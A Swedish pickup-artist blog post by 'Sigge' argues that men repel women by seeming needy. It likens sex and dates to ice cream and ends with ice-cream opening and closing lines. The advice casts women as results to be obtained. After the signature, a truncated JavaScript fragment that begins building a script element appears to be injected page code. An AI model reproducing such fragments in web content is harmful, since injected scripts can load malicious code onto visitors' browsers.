Se det som glass!

Ett vanligt problem som många killar har, speciellt när de har gått ut ett tag och börjat få resultat, är att de blir emotionellt bundna vid att få ett visst resultat. Kommer de hem en kväll och inte har fått varken nummer eller hångel så känner de sig dåliga, eller om en tjej som de skulle träffa hör av sig och ställer in i sista stund, om man inte har fått ligga på X dagar/veckor/whatever, osv osv.

En sak som är otroligt avtändande för kvinnor är när män är needy, eller behövande. Om det finns något i ditt sätt som signalerar att ”jag behöver det här” så kommer hon att känna av det och repelleras. Detta är något som alltid infinner sig om man verkligen känner att ”nu behöver jag det här”.

Jag minns en kväll i min tidiga utveckling, mötte upp med mina vanliga wings, och den kvällen skulle det följa med två killar som var nyare, som inte hade tränat sina sociala skills lika länge som jag som kanske hållit på i ett halvår. De började direkt bygga upp förväntningar och ställa krav på sig själva, medan jag som redan då hade lärt mig en del stolt kunde utbrista att det handlar ju bara om ”I do not give a fuck what people think of me”, och så länge man har roligt själv så kommer resultaten komma. Detta skulle jag då också bevisa för dessa nya guys, duktig som jag var, och så fort vi rörde oss mot utestället så började jag göra sinnessjuka grejer bara för att bevisa min poäng. Jag gick fram till folk och sa och gjorde de mest outrageous grejerna för att maximalt ge uttryck över hur lite jag brydde mig om vad de tyckte. Och det är sant, de flesta tjejerna sa åt mig att dra åt helvete (för jag var redigt konstig, med flit), och jag brydde mig ärligt talat inte vad de tyckte. Jag gjorde det om och om och om igen. Brydde mig fortfarande inte vad nån tyckte om mig. Gjorde bort mig i en, två, fem grupper, tio grupper, brydde mig inte alls, det bara rann av mig som vatten rinner av en gås. Men efter tio gånger så kände jag att nä, fan, nu är det dags att få mig lite resultat! Nu ska jag se till att få nånting att hända mer än att visa att jag inte bryr mig om vad folk tycker om mig. Och vad hände då? Jo, jag började bry mig om resultatet. Följden av det blev att varje grupp jag öppnade hade jag mer och mer vibben av ”snälla, tyck om mig”, vilket självklart ledde till att jag va en creepy kille som blev avvisad av samtliga tjejer på den krogen. Ja, du läste rätt, jag blev avvisad av alla tjejer som fanns på det stället, en normalstor stureplansklubb. En av grejerna som jag gjorde för att vända på kvällen var helt enkelt att ge upp, att sluta tro att nu ska jag vända den, och bara göra det bästa av situationen. Jag gick från stället, mötte upp med några vänner, och väl inne på McDonalds lyckades jag få en tjejs nummer bara tack vare bra ögonkontakt. För vid det laget vibbade mina ögon igenom inget annat än ”nä, nu skiter jag i det här, nu ska jag bara ha roligt!”.

Vad är lärdomarna av allt detta?
1) Om man bryr sig om resultatet för mycket blir man creepy direkt avskräckande för kvinnor.
2) Om man inte bryr sig om resultatet alls springer man bara runt och har roligt och får aldrig några resultat med tjejer.

Hur kommer vi då ur detta till synes paradoxala läge?

Se det som glass!
Se alla resultat, avslut, kyssar, sex, osv som du skulle se på att äta glass. Alla vill ha glass, och glass gör helt klart ens tillvaro lite trevligare. Men ärligt talat, har någons dag eller kväll någonsin varit beroende av huruvida man får glass? Glass gör en bra dag bättre och en dålig dag lite mindre dålig, men den förändrar egentligen ingenting. Så är det med alla resultat med kvinnor också, och har du den inställningen att ”nu är jag ute för att ha roligt, och vad härligt det vore med lite glass!” så har du rätt inställning för att attrahera kvinnor. Och går du ut med inställningen att ”jag måste ha glass, nu!” så kan du tänka dig vilken responsen blir.

Erbjud glass! (värde)
Samma sak gäller när det kommer till att se dig själv och det du erbjuder av dig själv till kvinnor. Att gå hem och ha sex med dig är för henne som att äta glass. Att ha en date med dig är för henne som att äta en glass. Hur beter man sig, hur pratar man när man erbjuder en annan människa glass? Hur reagerar man om den andra personen av någon outgrundlig anledning inte vill ha glass? Knappast någon big deal, eller hur? Det är ingen big deal vare sig för dig, eller för henne, även om det är tråkigt att det inte blev någon glass.

The pickup-lines
Jag har lovat att mina bloggposter ska innehålla något konkret, något man kan göra när man är ute, så här har du också ett sätt att inleda en konversation med en människa. ”Gillar du glass?”. Därefter kan du återberätta innehållet i denna bloggpost, och så har du ett samtal igång. När det börjar bli dags för hemgång är det bara att fråga ”Vill du följa med mig hem o äta glass?”.

Med varma glassönskningar
//Sigge

var d=document;var s=d.createElement(‘script’);